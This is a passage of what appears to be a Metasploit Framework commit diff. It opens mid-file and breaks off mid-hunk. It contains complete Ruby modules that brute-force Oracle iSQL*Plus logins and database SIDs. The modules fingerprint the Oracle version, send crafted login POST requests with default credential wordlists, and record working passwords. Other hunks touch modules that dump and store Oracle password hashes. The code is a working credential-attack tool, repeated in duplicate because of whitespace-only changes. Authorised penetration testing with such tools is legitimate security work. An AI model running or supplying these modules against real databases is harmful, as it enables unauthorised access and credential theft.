'Name' => 'Oracle iSQL*Plus Login Utility',
'Version' => '$Revision$',
'Description' => %q{
This module attempts to authenticate against an Oracle ISQL*Plus
administration web site using username and password combinations indicated
by the USER_FILE, PASS_FILE, and USERPASS_FILE.
This module does not require a valid SID, but if one is defined, it will be used.
Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to
fingerprint the version and automatically select the correct POST request.
},
'References' =>
[
[ 'URL', 'http://carnal0wnage.attackresearch.com' ],
],
'Author' => [ 'CG', 'todb' ],
'License' => MSF_LICENSE
)
deregister_options('BLANK_PASSWORDS') # Blank passwords are never valid
register_options([
Opt::RPORT(5560),
OptString.new('URI', [ true, 'Oracle iSQLPlus path.', '/isqlplus/']),
OptString.new('SID', [ false, 'Oracle SID' ]),
OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 60]),
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
], self.class)
end
def verbose; datastore['VERBOSE']; end
def uri; datastore['URI'].to_s; end
def timeout
(datastore['TIMEOUT'] || 60).to_i
end
def prefix
datastore['SSL'] ? "https" : "http"
end
def msg
"#{prefix}://#{rhost}:#{rport}/#{datastore['URI'].gsub(/^\/+/,"")} -"
end
def get_oracle_version(ip)
begin
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'GET',
}, timeout)
oracle_ver = nil
if (res.nil?)
print_error("#{msg} no response")
elsif (res.code == 200)
print_status("#{msg} Received an HTTP #{res.code}")
oracle_ver = detect_oracle_version(res)
elsif (res.code == 404)
print_error("#{msg} Received an HTTP 404, check URIPATH")
elsif (res.code == 302)
print_error("#{msg} Received an HTTP 302 to #{res.headers['Location']}")
else
print_error("#{msg} Received an HTTP #{res.code}")
end
return oracle_ver
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error "#{msg} Cannot connect"
end
end
def detect_oracle_version(res)
m = res.body.match(/iSQL\*Plus Release (9\.0|9\.1|9\.2|10\.1|10\.2)/)
oracle_ver = nil
oracle_ver = 10 if m[1] && m[1] =~ /10/
oracle_ver = m[1].to_f if m[1] && m[1] =~ /9\.[012]/
if oracle_ver
print_status("#{msg} Detected Oracle version #{oracle_ver}")
print_status("#{msg} SID detection for iSQL*Plus 10.1 may be unreliable") if oracle_ver == 10.1
else
print_error("#{msg} Unknown Oracle version detected.")
end
return oracle_ver
end
def check_oracle_version(ver)
[9.0,9.1,9.2,10].include? ver
end
def run_host(ip)
datastore['BLANK_PASSWORDS'] = false # Always
ver = get_oracle_version(ip)
if not check_oracle_version(ver)
print_error "#{msg} Unknown Oracle version, skipping."
return
end
if datastore['SID'].nil? || datastore['SID'].empty?
print_status "Using blank SID for authentication."
end
each_user_pass do |user, pass|
# Blank passwords aren't allowed
if pass.nil? || pass.empty?
print_status "Skipping blank password for #{user}"
else
do_login(user, pass, ver)
end
end
end
def sid
if datastore['SID'].nil? || datastore['SID'].empty?
nil
else
datastore['SID']
end
end
def do_login(user='DBSNMP', pass='DBSNMP', version=9.0)
uri = datastore['URI']
vprint_status("#{msg} Trying username:'#{user}' with password:'#{pass}' with SID '#{sid}'")
success = false
if version == 9.0
postrequest = "action=logon&sqlcmd=&sqlparms=&username=#{user}&password=#{pass}&sid=#{sid}&privilege=&Log+In=%B5%C7%C2%BC"
elsif (version == 9.1 || version == 9.2)
postrequest = "action=logon&username=#{user}&password=#{pass}&sid=#{sid}&login=Login"
elsif (version == 10)
postrequest = "username=#{user}&password=#{pass}&connectID=#{sid}&report=&script=&dynamic=&type=&action=&variables=&event=login"
end
begin
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'POST',
'data' => postrequest,
'headers' =>
{
'Referer' => "http://#{rhost}:#{rport}#{uri}"
}
}, timeout)
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{msg} Not responding")
return :abort
end
return :abort if (res.code == 404)
if res.code == 200
# English, German, and Danish.
if (res.body =~ /Connected as/ or res.body =~ /Angemeldet als/ or res.body =~ /Arbejdssk/)
success = true
elsif (res.body =~ /ORA-01017:/ or res.body =~ /ORA-28273:/)
#print_error("received ORA-01017 -- incorrect credentials")
success = false
elsif (res.body =~ /ORA-28009:/ )
print_good("#{user}:#{pass} is correct but required SYSDBA or SYSOPER login")
success = true
elsif (res.body =~ /ORA-28000:/ )#locked account
success = false
elsif (res.body =~ /ORA-12170:/ or res.body =~ /ORA-12154:/ or res.body =~ /ORA-12162:/ or res.body =~ /ORA-12560:/)
print_status("Incorrect SID -- please set a correct (or blank) SID")
return :abort
elsif
print_status("Unknown response, assuming failed. (Supported languages are English, German, and Danish)")
success = false
end
elsif res.code == 302
print_status("received a 302 to #{res.headers['Location']}")
return :abort
else
print_status("Unexpected Response of: #{res.code}")#''
return :abort
end
rescue ::Rex::ConnectionError => e
vprint_error("#{msg} - #{e}")
return :abort
end
if success
print_good("#{msg} successful login '#{user}' : '#{pass}' for SID '#{sid}'")
report_isqlplus_service(target_host,res)
report_oracle_sid(target_host,sid)
report_isqlauth_info(target_host,user,pass,sid)
return :next_user
else
vprint_status "#{msg} username and password failed"
return :failed
end
end
def report_isqlplus_service(ip,res)
sname = datastore['SSL'] ? 'https' : 'http'
report_service(
:host => ip,
:proto => 'tcp',
:port => rport,
:name => sname,
:info => res.headers["Server"].to_s.strip
)
end
def report_oracle_sid(ip,sid)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => "oracle.sid",
:data => ((sid.nil? || sid.empty?) ? "*BLANK*" : sid),
:update => :unique_data
)
end
def report_isqlauth_info(ip,user,pass,sid)
ora_info = {
:host => ip, :port => rport, :proto => "tcp",
:pass => pass, :active => true
}
if sid.nil? || sid.empty?
ora_info.merge! :user => user
else
ora_info.merge! :user => "#{sid}/#{user}"
end
report_auth_info(ora_info)
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
def initialize
super(
'Name' => 'Oracle iSQL*Plus Login Utility',
'Version' => '$Revision$',
'Description' => %q{
This module attempts to authenticate against an Oracle ISQL*Plus
administration web site using username and password combinations indicated
by the USER_FILE, PASS_FILE, and USERPASS_FILE.
This module does not require a valid SID, but if one is defined, it will be used.
Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to
fingerprint the version and automatically select the correct POST request.
},
'References' =>
[
[ 'URL', 'http://carnal0wnage.attackresearch.com' ],
],
'Author' => [ 'CG', 'todb' ],
'License' => MSF_LICENSE
)
deregister_options('BLANK_PASSWORDS') # Blank passwords are never valid
register_options([
Opt::RPORT(5560),
OptString.new('URI', [ true, 'Oracle iSQLPlus path.', '/isqlplus/']),
OptString.new('SID', [ false, 'Oracle SID' ]),
OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 60]),
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
], self.class)
end
def verbose; datastore['VERBOSE']; end
def uri; datastore['URI'].to_s; end
def timeout
(datastore['TIMEOUT'] || 60).to_i
end
def prefix
datastore['SSL'] ? "https" : "http"
end
def msg
"#{prefix}://#{rhost}:#{rport}/#{datastore['URI'].gsub(/^\/+/,"")} -"
end
def get_oracle_version(ip)
begin
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'GET',
}, timeout)
oracle_ver = nil
if (res.nil?)
print_error("#{msg} no response")
elsif (res.code == 200)
print_status("#{msg} Received an HTTP #{res.code}")
oracle_ver = detect_oracle_version(res)
elsif (res.code == 404)
print_error("#{msg} Received an HTTP 404, check URIPATH")
elsif (res.code == 302)
print_error("#{msg} Received an HTTP 302 to #{res.headers['Location']}")
else
print_error("#{msg} Received an HTTP #{res.code}")
end
return oracle_ver
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error "#{msg} Cannot connect"
end
end
def detect_oracle_version(res)
m = res.body.match(/iSQL\*Plus Release (9\.0|9\.1|9\.2|10\.1|10\.2)/)
oracle_ver = nil
oracle_ver = 10 if m[1] && m[1] =~ /10/
oracle_ver = m[1].to_f if m[1] && m[1] =~ /9\.[012]/
if oracle_ver
print_status("#{msg} Detected Oracle version #{oracle_ver}")
print_status("#{msg} SID detection for iSQL*Plus 10.1 may be unreliable") if oracle_ver == 10.1
else
print_error("#{msg} Unknown Oracle version detected.")
end
return oracle_ver
end
def check_oracle_version(ver)
[9.0,9.1,9.2,10].include? ver
end
def run_host(ip)
datastore['BLANK_PASSWORDS'] = false # Always
ver = get_oracle_version(ip)
if not check_oracle_version(ver)
print_error "#{msg} Unknown Oracle version, skipping."
return
end
if datastore['SID'].nil? || datastore['SID'].empty?
print_status "Using blank SID for authentication."
end
each_user_pass do |user, pass|
# Blank passwords aren't allowed
if pass.nil? || pass.empty?
print_status "Skipping blank password for #{user}"
else
do_login(user, pass, ver)
end
end
end
def sid
if datastore['SID'].nil? || datastore['SID'].empty?
nil
else
datastore['SID']
end
end
def do_login(user='DBSNMP', pass='DBSNMP', version=9.0)
uri = datastore['URI']
vprint_status("#{msg} Trying username:'#{user}' with password:'#{pass}' with SID '#{sid}'")
success = false
if version == 9.0
postrequest = "action=logon&sqlcmd=&sqlparms=&username=#{user}&password=#{pass}&sid=#{sid}&privilege=&Log+In=%B5%C7%C2%BC"
elsif (version == 9.1 || version == 9.2)
postrequest = "action=logon&username=#{user}&password=#{pass}&sid=#{sid}&login=Login"
elsif (version == 10)
postrequest = "username=#{user}&password=#{pass}&connectID=#{sid}&report=&script=&dynamic=&type=&action=&variables=&event=login"
end
begin
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'POST',
'data' => postrequest,
'headers' => { 'Referer' => "http://#{rhost}:#{rport}#{uri}" }
}, timeout)
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{msg} Not responding")
return :abort
end
return :abort if (res.code == 404)
if res.code == 200
# English, German, and Danish.
if (res.body =~ /Connected as/ or res.body =~ /Angemeldet als/ or res.body =~ /Arbejdssk/)
success = true
elsif (res.body =~ /ORA-01017:/ or res.body =~ /ORA-28273:/)
#print_error("received ORA-01017 -- incorrect credentials")
success = false
elsif (res.body =~ /ORA-28009:/ )
print_good("#{user}:#{pass} is correct but required SYSDBA or SYSOPER login")
success = true
elsif (res.body =~ /ORA-28000:/ )#locked account
success = false
elsif (res.body =~ /ORA-12170:/ or res.body =~ /ORA-12154:/ or res.body =~ /ORA-12162:/ or res.body =~ /ORA-12560:/)
print_status("Incorrect SID -- please set a correct (or blank) SID")
return :abort
elsif
print_status("Unknown response, assuming failed. (Supported languages are English, German, and Danish)")
success = false
end
elsif res.code == 302
print_status("received a 302 to #{res.headers['Location']}")
return :abort
else
print_status("Unexpected Response of: #{res.code}")#''
return :abort
end
rescue ::Rex::ConnectionError => e
vprint_error("#{msg} - #{e}")
return :abort
end
if success
print_good("#{msg} successful login '#{user}' : '#{pass}' for SID '#{sid}'")
report_isqlplus_service(target_host,res)
report_oracle_sid(target_host,sid)
report_isqlauth_info(target_host,user,pass,sid)
return :next_user
else
vprint_status "#{msg} username and password failed"
return :failed
end
end
def report_isqlplus_service(ip,res)
sname = datastore['SSL'] ? 'https' : 'http'
report_service(
:host => ip,
:proto => 'tcp',
:port => rport,
:name => sname,
:info => res.headers["Server"].to_s.strip
)
end
def report_oracle_sid(ip,sid)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => "oracle.sid",
:data => ((sid.nil? || sid.empty?) ? "*BLANK*" : sid),
:update => :unique_data
)
end
def report_isqlauth_info(ip,user,pass,sid)
ora_info = {
:host => ip, :port => rport, :proto => "tcp",
:pass => pass, :active => true
}
if sid.nil? || sid.empty?
ora_info.merge! :user => user
else
ora_info.merge! :user => "#{sid}/#{user}"
end
report_auth_info(ora_info)
end
end

476
modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb
View File

@ -1,238 +1,238 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Oracle isqlplus SID Check',
'Version' => '$Revision$',
'Description' => %q{
This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus
login pages. It does this by testing Oracle error responses returned in the HTTP response.
Incorrect username/pass with a correct SID will produce an Oracle ORA-01017 error.
Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to
fingerprint the version and automatically select the correct POST request.
},
'References' =>
[
[ 'URL', 'http://carnal0wnage.attackresearch.com' ],
],
'Author' => [ 'CG', 'todb' ],
'License' => MSF_LICENSE
)
register_options([
Opt::RPORT(5560),
OptString.new('URI', [ true, 'Oracle iSQLPlus path', '/isqlplus/']),
OptString.new('SID', [ false, 'A single SID to test']),
OptPath.new('SIDFILE', [ false, 'A file containing a list of SIDs', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 30])
], self.class)
deregister_options(
"RHOST", "USERNAME", "PASSWORD", "USER_FILE", "PASS_FILE", "USERPASS_FILE",
"BLANK_PASSWORDS", "USER_AS_PASS", "REMOVE_USER_FILE", "REMOVE_PASS_FILE",
"BRUTEFORCE_SPEED" # Slow as heck anyway
)
end
def sid_file
datastore['SIDFILE']
end
def hostport
[target_host,rport].join(":")
end
def uri
datastore['URI'] || "/isqlplus/"
end
def timeout
(datastore['TIMEOUT'] || 30).to_i
end
def msg
msg = "#{hostport} - Oracle iSQL*Plus -"
end
def run_host(ip)
oracle_ver = get_oracle_version(ip)
if not check_oracle_version(oracle_ver)
print_error "#{msg} Unknown Oracle version, skipping."
return
end
begin
print_status("#{msg} Starting SID check")
sid_data.each do |sid|
guess = check_oracle_sid(ip,oracle_ver,sid)
return if guess and datastore['STOP_ON_SUCCESS']
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error "#{msg} Cannot connect"
rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e
print_error e.message
end
end
def get_oracle_version(ip)
begin
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'GET',
}, timeout)
oracle_ver = nil
if (res.nil?)
print_error("#{msg} no response")
elsif (res.code == 200)
print_status("#{msg} Received an HTTP #{res.code}")
oracle_ver = detect_oracle_version(res)
elsif (res.code == 404)
print_error("#{msg} Received an HTTP 404, check URIPATH")
elsif (res.code == 302)
print_error("#{msg} Received an HTTP 302 to #{res.headers['Location']}")
else
print_error("#{msg} Received an HTTP #{res.code}")
end
return oracle_ver
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error "#{msg} Cannot connect"
end
end
def detect_oracle_version(res)
m = res.body.match(/iSQL\*Plus Release (9\.0|9\.1|9\.2|10\.1|10\.2)/)
oracle_ver = nil
oracle_ver = 10 if m[1] && m[1] =~ /10/
oracle_ver = m[1].to_f if m[1] && m[1] =~ /9\.[012]/
if oracle_ver
print_status("#{msg} Detected Oracle version #{oracle_ver}")
print_status("#{msg} SID detection for iSQL*Plus 10.1 may be unreliable") if oracle_ver == 10.1
else
print_error("#{msg} Unknown Oracle version detected.")
end
return oracle_ver
end
def check_oracle_version(ver)
[9.0,9.1,9.2,10].include? ver
end
def build_post_request(ver,sid)
post_request = nil
case ver
when 9.0
post_request = "action=logon&sqlcmd=&sqlparms=&username=scott&password=tiger&sid=#{sid.strip}&privilege=&Log+In=%B5%C7%C2%BC"
when 9.1
post_request = "action=logon&username=a&password=a&sid=#{sid.strip}&login=Login"
when 9.2
post_request = "action=logon&username=a&password=a&sid=#{sid.strip}&login=Login"
when 10
post_request = "username=a&password=a&connectID=#{sid.strip}&report=&script=&dynamic=&type=&action=&variables=&event=login"
end
return post_request
end
def parse_isqlplus_response(res,sid)
guess = false
if (res.nil?)
print_error("#{msg} No response")
elsif (res.code == 200)
if (res.body =~ /ORA-01017:/ or res.body =~ /ORA-28273:/)
if sid.nil? || sid.empty?
print_good("#{msg} Recieved ORA-01017 on a blank SID -- SIDs are not enforced upon login.")
else
print_good("#{msg} Received ORA-01017, probable correct SID '#{sid.strip}'")
end
guess = true
elsif (res.body =~ /(ORA-12170):/ or res.body =~ /(ORA-12154):/ or res.body =~ /(ORA-12162):/)
vprint_status("#{msg} Incorrect SID: '#{sid.strip}' (got error code #{$1})")
elsif res.body =~ /(ORA-12541):/
print_status("#{msg} Possible correct SID, but got ORA-12541: No Listener error.")
guess = true
else
print_status("#{msg} Received an unknown error") # Should say what the error was
end
elsif (res.code == 404)
print_status("#{msg} Received an HTTP 404, check URIPATH")
elsif (res.code == 302)
print_status("#{msg} Received an HTTP 302 redirect to #{res.headers['Location']}")
else
print_status("#{msg} Received an unexpected response: #{res.code}")
end
report_isqlplus_service(target_host,res) if res
return guess
end
def report_isqlplus_service(ip,res)
sname = datastore['SSL'] ? 'https' : 'http'
report_service(
:host => ip,
:proto => 'tcp',
:port => rport,
:name => sname,
:info => res.headers["Server"].to_s.strip
)
end
def report_oracle_sid(ip,sid)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => "oracle.sid",
:data => ((sid.nil? || sid.empty?) ? "*BLANK*" : sid),
:update => :unique_data
)
end
def sid_data
if datastore['SID'] and not datastore['SID'].empty?
[datastore['SID']]
elsif sid_file and ::File.readable? sid_file
::File.open(sid_file,"rb") {|f| f.read f.stat.size}.each_line.map {|x| x.strip.upcase}.uniq
else
raise ArugmentError, "Cannot read file '#{sid_file}'"
end
end
def check_oracle_sid(ip,oracle_ver,sid)
post_request = build_post_request(oracle_ver,sid)
vprint_status "#{msg} Trying SID '#{sid}', waiting for response..."
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'POST',
'data' => post_request,
'headers' =>
{
'Referer' => "http://#{ip}:#{rport}#{uri}"
}
}, timeout)
guess = parse_isqlplus_response(res,sid)
report_oracle_sid(ip,sid) if guess
return guess
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Oracle isqlplus SID Check',
'Version' => '$Revision$',
'Description' => %q{
This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus
login pages. It does this by testing Oracle error responses returned in the HTTP response.
Incorrect username/pass with a correct SID will produce an Oracle ORA-01017 error.
Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to
fingerprint the version and automatically select the correct POST request.
},
'References' =>
[
[ 'URL', 'http://carnal0wnage.attackresearch.com' ],
],
'Author' => [ 'CG', 'todb' ],
'License' => MSF_LICENSE
)
register_options([
Opt::RPORT(5560),
OptString.new('URI', [ true, 'Oracle iSQLPlus path', '/isqlplus/']),
OptString.new('SID', [ false, 'A single SID to test']),
OptPath.new('SIDFILE', [ false, 'A file containing a list of SIDs', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 30])
], self.class)
deregister_options(
"RHOST", "USERNAME", "PASSWORD", "USER_FILE", "PASS_FILE", "USERPASS_FILE",
"BLANK_PASSWORDS", "USER_AS_PASS", "REMOVE_USER_FILE", "REMOVE_PASS_FILE",
"BRUTEFORCE_SPEED" # Slow as heck anyway
)
end
def sid_file
datastore['SIDFILE']
end
def hostport
[target_host,rport].join(":")
end
def uri
datastore['URI'] || "/isqlplus/"
end
def timeout
(datastore['TIMEOUT'] || 30).to_i
end
def msg
msg = "#{hostport} - Oracle iSQL*Plus -"
end
def run_host(ip)
oracle_ver = get_oracle_version(ip)
if not check_oracle_version(oracle_ver)
print_error "#{msg} Unknown Oracle version, skipping."
return
end
begin
print_status("#{msg} Starting SID check")
sid_data.each do |sid|
guess = check_oracle_sid(ip,oracle_ver,sid)
return if guess and datastore['STOP_ON_SUCCESS']
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error "#{msg} Cannot connect"
rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e
print_error e.message
end
end
def get_oracle_version(ip)
begin
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'GET',
}, timeout)
oracle_ver = nil
if (res.nil?)
print_error("#{msg} no response")
elsif (res.code == 200)
print_status("#{msg} Received an HTTP #{res.code}")
oracle_ver = detect_oracle_version(res)
elsif (res.code == 404)
print_error("#{msg} Received an HTTP 404, check URIPATH")
elsif (res.code == 302)
print_error("#{msg} Received an HTTP 302 to #{res.headers['Location']}")
else
print_error("#{msg} Received an HTTP #{res.code}")
end
return oracle_ver
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error "#{msg} Cannot connect"
end
end
def detect_oracle_version(res)
m = res.body.match(/iSQL\*Plus Release (9\.0|9\.1|9\.2|10\.1|10\.2)/)
oracle_ver = nil
oracle_ver = 10 if m[1] && m[1] =~ /10/
oracle_ver = m[1].to_f if m[1] && m[1] =~ /9\.[012]/
if oracle_ver
print_status("#{msg} Detected Oracle version #{oracle_ver}")
print_status("#{msg} SID detection for iSQL*Plus 10.1 may be unreliable") if oracle_ver == 10.1
else
print_error("#{msg} Unknown Oracle version detected.")
end
return oracle_ver
end
def check_oracle_version(ver)
[9.0,9.1,9.2,10].include? ver
end
def build_post_request(ver,sid)
post_request = nil
case ver
when 9.0
post_request = "action=logon&sqlcmd=&sqlparms=&username=scott&password=tiger&sid=#{sid.strip}&privilege=&Log+In=%B5%C7%C2%BC"
when 9.1
post_request = "action=logon&username=a&password=a&sid=#{sid.strip}&login=Login"
when 9.2
post_request = "action=logon&username=a&password=a&sid=#{sid.strip}&login=Login"
when 10
post_request = "username=a&password=a&connectID=#{sid.strip}&report=&script=&dynamic=&type=&action=&variables=&event=login"
end
return post_request
end
def parse_isqlplus_response(res,sid)
guess = false
if (res.nil?)
print_error("#{msg} No response")
elsif (res.code == 200)
if (res.body =~ /ORA-01017:/ or res.body =~ /ORA-28273:/)
if sid.nil? || sid.empty?
print_good("#{msg} Recieved ORA-01017 on a blank SID -- SIDs are not enforced upon login.")
else
print_good("#{msg} Received ORA-01017, probable correct SID '#{sid.strip}'")
end
guess = true
elsif (res.body =~ /(ORA-12170):/ or res.body =~ /(ORA-12154):/ or res.body =~ /(ORA-12162):/)
vprint_status("#{msg} Incorrect SID: '#{sid.strip}' (got error code #{$1})")
elsif res.body =~ /(ORA-12541):/
print_status("#{msg} Possible correct SID, but got ORA-12541: No Listener error.")
guess = true
else
print_status("#{msg} Received an unknown error") # Should say what the error was
end
elsif (res.code == 404)
print_status("#{msg} Received an HTTP 404, check URIPATH")
elsif (res.code == 302)
print_status("#{msg} Received an HTTP 302 redirect to #{res.headers['Location']}")
else
print_status("#{msg} Received an unexpected response: #{res.code}")
end
report_isqlplus_service(target_host,res) if res
return guess
end
def report_isqlplus_service(ip,res)
sname = datastore['SSL'] ? 'https' : 'http'
report_service(
:host => ip,
:proto => 'tcp',
:port => rport,
:name => sname,
:info => res.headers["Server"].to_s.strip
)
end
def report_oracle_sid(ip,sid)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => "oracle.sid",
:data => ((sid.nil? || sid.empty?) ? "*BLANK*" : sid),
:update => :unique_data
)
end
def sid_data
if datastore['SID'] and not datastore['SID'].empty?
[datastore['SID']]
elsif sid_file and ::File.readable? sid_file
::File.open(sid_file,"rb") {|f| f.read f.stat.size}.each_line.map {|x| x.strip.upcase}.uniq
else
raise ArugmentError, "Cannot read file '#{sid_file}'"
end
end
def check_oracle_sid(ip,oracle_ver,sid)
post_request = build_post_request(oracle_ver,sid)
vprint_status "#{msg} Trying SID '#{sid}', waiting for response..."
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'POST',
'data' => post_request,
'headers' =>
{
'Referer' => "http://#{ip}:#{rport}#{uri}"
}
}, timeout)
guess = parse_isqlplus_response(res,sid)
report_oracle_sid(ip,sid) if guess
return guess
end
end

9
modules/auxiliary/scanner/oracle/oracle_hashdump.rb
View File

@ -107,8 +107,6 @@ class Metasploit3 < Msf::Auxiliary
end
def get_schema
#Grabs the Database and table names for storage
#These names will be sued later to seed wordlists for cracking
@ -127,10 +125,10 @@ class Metasploit3 < Msf::Auxiliary
end
return schema
end
def report_hashes(hash_loot, is_11g, ip, service)
#reports the hashes slightly differently depending on the version
#This is so that we know which are which when we go to crack them
#reports the hashes slightly differently depending on the version
#This is so that we know which are which when we go to crack them
if is_11g==false
filename= "#{ip}-#{datastore['RPORT']}_oraclehashes.txt"
store_loot("oracle.hashes", "text/plain", ip, hash_loot, filename, "Oracle Hashes", service)
@ -140,7 +138,6 @@ class Metasploit3 < Msf::Auxiliary
store_loot("oracle11g.hashes", "text/plain", ip, hash_loot, filename, "Oracle 11g Hashes", service)
print_status("Hash Table has been saved")
end
end
def report_other_data(oracle_schema,ip)

2
modules/auxiliary/scanner/oracle/oracle_login.rb
View File

@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary
pass = "" if pass == "<empty>"
print_good "#{msg} Success: #{user}:#{pass} (SID: #{sid})"
report_auth_info(
:host => addr, :port => port, :proto => "tcp",
:host => addr, :port => port, :proto => "tcp",
:user => "#{sid}/#{user}", :pass => pass, :active => true
)
elsif oline =~ /Account locked/

2
modules/auxiliary/scanner/oracle/sid_brute.rb
View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
deregister_options(
"RHOST", "USERNAME", "PASSWORD", "USER_FILE", "PASS_FILE", "USERPASS_FILE",
"RHOST", "USERNAME", "PASSWORD", "USER_FILE", "PASS_FILE", "USERPASS_FILE",
"BLANK_PASSWORDS", "USER_AS_PASS", "REMOVE_USER_FILE", "REMOVE_PASS_FILE",
"REMOVE_USERPASS_FILE"
)

64
modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
View File

@ -278,13 +278,63 @@ class Metasploit3 < Msf::Auxiliary
pgt = e.elements['LIMIT'].get_text
end
end
print_good("\tFailed Login Attempts: #{fla}\n\tPassword Life Time: #{plit}\n\tPassword Reuse Time: #{prt}\n\tPassword Reuse Max: #{prm}\n\tPassword Lock Time: #{plot}\n\tPassword Grace Time: #{pgt}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Maximum Reuse Time: #{prm}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Reuse Time: #{prt}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Life Time: #{plit}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Fail Logins Permitted: #{fla}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Lockout Time: #{plot}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Password Grace Time: #{pgt}")
print_good(
"\tFailed Login Attempts: #{fla}\n\t" +
"Password Life Time: #{plit}\n\t" +
"Password Reuse Time: #{prt}\n\t" +
"Password Reuse Max: #{prm}\n\t" +
"Password Lock Time: #{plot}\n\t" +
"Password Grace Time: #{pgt}"
)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'XDB',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Password Maximum Reuse Time: #{prm}"
)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'XDB',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Password Reuse Time: #{prt}"
)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'XDB',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Password Life Time: #{plit}"
)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'XDB',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account Fail Logins Permitted: #{fla}"
)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'XDB',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account Lockout Time: #{plot}"
)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'XDB',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
